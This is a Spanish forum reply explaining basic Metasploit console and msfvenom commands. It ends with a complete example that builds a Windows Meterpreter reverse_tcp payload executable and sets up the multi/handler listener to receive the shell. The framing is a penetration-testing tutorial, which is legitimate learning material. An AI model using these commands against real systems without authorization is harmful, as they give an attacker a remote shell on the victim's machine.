@pacosomalosoTe dire algunos comandos basicos:
Consola de metasploit:
use <modulo> :: Es para seleccionar un modulo de metasploit y usarlo.
reload :: recarga los modulos en tal caso de que se haya agregado un modulo y la consola estuvo abierta
search <coincidencia del modulo o modulo> :: Busca una coincidencia de un modulo cargado de metasploit
set <parametro> :: ajusta un valor de un parametro
show <parametro> :: muestra alguna opcion como puede ser un payload, exploit, auxiliar, etc. EJ: show payloads
options :: lo mismo que que show options
run o exploit :: una vez ajustado todas las opciones, arrancas o inicias el exploit
MSFVenom:
-p <payload> :: selecciona una carga útil de la lista de payloads
-h, --help :: ver la ayuda
LHOST=<tu direccion ip/nombre del host/dns/etc> :: LHOST (Local HOST) Tu direccion para establecer una conexion entre metasploit y la carga util
LPORT=<tu puerto local> :: Establece el puerto donde recibiras la conexion
-f <formato de la carga útil> :: El formato de la carga util por ejemplo: raw. Generara una carga util dependiendo de la extension del archivo usando el parametro con -o, si en tal caso no se especifica una extension se usara el formato de un ejecutable de windows
-o <nombre del archivo a generar> :: Nombre de la carga util, si no se especifica el -f y colocas el nombre por ejemplo: .exe, .ps1 se creara con ese formato. En tal caso de que sea lo contrario y especificas -f por ejemplo: -f exe y colocas en el parametro -o .ps1, .txt, etc, se creara con esa extension pero con el formato exe (un ejecutable de windows)
Aqui una lista de payloads disponibles (OJO: no se si esta actualizada), con el mismo msfvenom puedes ver la lista (Pero no recuerdo el parametro :/):
https://superuser-ltd.github.io/2017/msfvenom-payloads/Un ejemplo de comandos que se usuarian en una prueba de penetracion:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4445 -f raw -o payload.exe
msfconsole
use exploit/multi/handler
set lhost 192.168.2.2
set lport 4445
set payload windows/meterpreter/reverse_tcp
exploit
Si deseas hablar mas sobre el tema, escribeme en privado (con gusto respondere dependiendo de mis conocimientos) ya que este tema esta solucionado.